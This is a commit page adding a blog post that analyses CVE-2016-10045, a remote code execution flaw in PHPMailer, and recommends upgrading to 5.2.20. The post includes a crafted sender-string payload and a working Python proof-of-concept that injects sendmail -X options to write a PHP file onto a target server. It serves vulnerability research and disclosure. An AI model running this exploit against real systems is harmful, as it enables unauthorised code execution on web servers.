forked from brianmaierjr/long-haul
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
feat(blog): add English version of CVE-2016-10045 post
- Loading branch information
1 parent
cbea84b
commit a9847bb
Showing
1 changed file
with
101 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,101 @@ | ||
| --- | ||
| layout: post | ||
| title: "Analysis of CVE-2016-10045: RCE in PHPMailer" | ||
| date: 2024-11-07 | ||
| --- | ||
|
|
||
| [CVE-2016-10045](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045)\[1\] is a critical vulnerability in [PHPMailer](https://github.com/PHPMailer/PHPMailer)\[2\], a widely used library for sending emails in [PHP](https://www.php.net/)\[3\] web applications, affecting versions prior to 5.2.18. This vulnerability allows attackers to execute malicious code on a compromised web server by exploiting an input validation flaw in the PHPMailer code. | ||
|
|
||
| This publication is also available in: [Portuguese](https://blog.lesis.lat/blog/CVE-2016-10045/) | ||
|
|
||
| --- | ||
|
|
||
| **Intro** | ||
|
|
||
| PHPMailer remains one of the most widely used email-sending libraries, with approximately 9 million users worldwide. Additionally, it is also used in numerous open-source projects such as WordPress, Drupal, and Joomla. | ||
|
|
||
| This vulnerability is particularly critical because, in most cases, the attacker does not need to be an authenticated user to inject malicious code and perform a [remote code execution (RCE)](https://www.cloudflare.com/en-gb/learning/security/what-is-remote-code-execution/)\[4\] on a web server. | ||
|
|
||
| To exploit this vulnerability, an attacker simply needs to identify a form field that uses PHPMailer for email sending and submit the payload. | ||
|
|
||
| --- | ||
|
|
||
| **Description** | ||
|
|
||
| This vulnerability stems from an inadequate fix for [CVE-2016-10033](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033)\[5\]. In PHPMailer version 5.2.17, the *$Sender* variable is sanitized using the *escapeshellarg()* function before being passed to the *mail()* function. However, an attacker can add an extra single quotation mark that isn’t properly escaped, breaking the intended flow of *escapeshellarg()*. | ||
|
|
||
| Example: | ||
|
|
||
| ```php | ||
| $mail \-\> SetFrom("\\"Attacker\\\\' \-Param2 \-Param3\\"@test.com", 'Client Name'); | ||
| ``` | ||
|
|
||
| The above will result in the following list of arguments being passed to the email-sending application: | ||
|
|
||
| ``` | ||
| Arg no. 0 \== \[/usr/sbin/sendmail\] | ||
| Arg no. 1 \== \[-t\] | ||
| Arg no. 2 \== \[-i\] | ||
| Arg no. 3 \== \[-f\\"Attacker\\\\\\\] | ||
| Arg no. 4 \== \[-Param2\] | ||
| Arg no. 5 \== \[-Param3"@test.com'\] | ||
| ``` | ||
|
|
||
| The attacker can pass the **\-X** parameter to create a log containing arbitrary PHP code, making versions prior to **5.2.20** vulnerable to remote code execution (RCE). | ||
|
|
||
| --- | ||
|
|
||
| **Proof of Concept** | ||
|
|
||
| Python script to exploit the vulnerability: | ||
|
|
||
| ```python | ||
| #!/usr/bin/env python3 | ||
| import requests | ||
| import argparse | ||
| import re | ||
| def exploit(url, dir): | ||
| if not re.match(r'^https?://', url): | ||
| url \= f"https://{url}" | ||
| payload \= "\\"attacker\\\\' \-oQ/tmp/ \-X%s/phpcode.php some\\"@email.com" % dir | ||
| code \= "\<?php phpinfo(); ?\>" | ||
|
|
||
| data \= {'action': 'send', 'name': 'LESIS', 'email': payload, 'msg': code} | ||
|
|
||
| response \= requests.post(url, data=data) | ||
|
|
||
| if response.status\_code \== 200: | ||
| print("Exploitation successful\!") | ||
| else: | ||
| print("Exploitation failed.") | ||
| def main(): | ||
| parser \= argparse.ArgumentParser(description='CVE-2016-10045 | PHPMailer') | ||
| parser.add\_argument('-t', '--target', required=True, help='Target URL') | ||
| parser.add\_argument('-d', '--dir', required=True, help='Remote recording directory') | ||
| args \= parser.parse\_args() | ||
|
|
||
| if args.target and args.dir: | ||
| exploit(args.target, args.dir) | ||
| if \_\_name\_\_ \== '\_\_main\_\_': | ||
| main() | ||
| ``` | ||
|
|
||
| --- | ||
|
|
||
| **Conclusion** | ||
|
|
||
| The vulnerability arises from a failure of improper input sanitization input in PHPMailer, allowing attackers to execute malicious code on compromised web servers. This poses a significant risk, as exploitation can be carried out without requiring authentication, allowing for remote code injection (RCE) in vulnerable applications. | ||
|
|
||
| The potential impact of a successful exploitation includes the execution of arbitrary code, which potentially leads to security breaches and unauthorized access to sensitive information. | ||
|
|
||
| The recommended mitigation is to update PHPMailer to version 5.2.20 or higher. | ||
|
|
||
| --- | ||
|
|
||
| **References** | ||
|
|
||
| * \[1\] [MITRE \- CVE-2016-10045](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045) | ||
| * \[2\] [GitHub \- PHPMailer: A full-featured email creation and transfer class for PHP](https://github.com/PHPMailer/PHPMailer) | ||
| * \[3\] [PHP \- A popular general-purpose scripting language](https://www.php.net) | ||
| * \[4\] [Cloudflare \- What is remote code execution?](https://www.cloudflare.com/en-gb/learning/security/what-is-remote-code-execution/) | ||
| * \[5\] [MITRE \- CVE-2016-10033](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033) |